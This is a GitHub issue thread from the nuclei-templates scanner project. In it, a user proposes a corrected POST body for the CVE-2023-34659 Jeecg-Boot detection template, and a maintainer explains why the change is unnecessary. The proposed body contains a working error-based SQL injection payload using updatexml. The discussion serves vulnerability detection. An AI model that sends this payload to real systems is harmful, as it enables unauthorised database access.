nuclei-templates icon indicating copy to clipboard operation
nuclei-templates copied to clipboard

Published 20 hours ago verified publisher icon projectdiscovery

CVE-2023-34659 Exp change wanted

Open hi-unc1e opened this issue 1 year ago • 1 comments

https://github.com/projectdiscovery/nuclei-templates/blame/68d09a4eb0c155b00a53e1e99d1fb077d14425bf/http/cves/2023/CVE-2023-34659.yaml#L39C1-L40C1

Considering a valid JSON format, the POST_body should be

{"id":"961455b47c0b86dc961e90b5893bff05","apiUrl":"","params":"{\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(select database())),1)) or '%%' like '\"}"}

See https://github.com/jeecgboot/jeecg-boot/issues/4976

hi-unc1e avatar Feb 26 '24 06:02 hi-unc1e

Hello, @hi-unc1e. Thank you for suggesting changes to the template. However, I noticed that the third image from the provided reference uses the version() in the payload, which is the same as in the template. Furthermore, adding database() or version() will not impact the template because it depends entirely on SQL error matchers.

ritikchaddha avatar Feb 27 '24 06:02 ritikchaddha

Closing this issue due to inactivity. Feel free to reopen it if you have more information

ritikchaddha avatar May 14 '24 04:05 ritikchaddha